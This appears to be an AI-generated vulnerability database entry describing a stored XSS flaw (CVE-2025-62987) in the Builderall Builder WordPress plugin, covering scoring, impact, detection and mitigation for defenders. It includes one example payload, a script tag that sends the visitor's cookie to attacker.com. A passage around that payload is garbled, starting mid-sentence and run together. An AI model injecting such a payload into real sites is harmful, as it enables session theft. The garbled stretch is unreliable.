
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62987 is a Stored Cross-Site Scripting (XSS) vulnerability in the Builderall Builder for WordPress plugin (builderall-cheetah-for-wp). It affects all versions up to and including 3.0.1, with no official patch available at the time of disclosure. The vulnerability was reported by Muhammad Yudha - DJ on September 23, 2025, and published by Patchstack on October 23, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically the Stored XSS variant. Exploitation requires a low-privileged authenticated user (Contributor or Developer role) to inject malicious scripts into content managed by the plugin, which are then persistently stored and executed in victims' browsers when they visit affected pages. User interaction by a privileged user is required for the payload to trigger, and the scope is changed, meaning the injected script can affect resources beyond the vulnerable component (Patchstack).
Successful exploitation allows an attacker with Contributor or Developer-level access to inject persistent malicious scripts (e.g., redirects, advertisements, credential-harvesting payloads) into WordPress pages built with the Builderall plugin. These scripts execute in the browsers of any visitor — including administrators — potentially enabling session hijacking, privilege escalation, or further site compromise. The confidentiality, integrity, and availability impacts are each rated Low, but the changed scope means the attack can affect end users beyond the WordPress installation itself (Patchstack).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-62987. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. Patchstack rates the priority as Low and notes the issue is unlikely to be exploited, though it acknowledges that XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale. There is no CISA KEV catalog entry for this CVE (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a plugin-managed content field that lacks proper output sanitization./wp-admin/admin-ajax.php or Builderall builder save endpoints) from low-privileged user accounts containing script tags or encoded JavaScript payloads.<script> tags or JavaScript URIs stored in WordPress post meta or options tables associated with Builderall builder content fields.As of the time of disclosure, no official patched version of the Builderall Builder for WordPress plugin has been released. Site administrators should consider deactivating and removing the plugin until a fix is available. Access controls should be reviewed to limit Contributor and Developer role assignments to trusted users only. Patchstack users can leverage virtual patching (RapidMitigate) as an interim mitigation (Patchstack).
Wordfence included this vulnerability in its weekly WordPress vulnerability report for the period of October 20–26, 2025, providing broader community visibility (Wordfence Blog). No significant vendor statements, notable researcher commentary, or major media coverage beyond standard vulnerability aggregation has been observed for this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."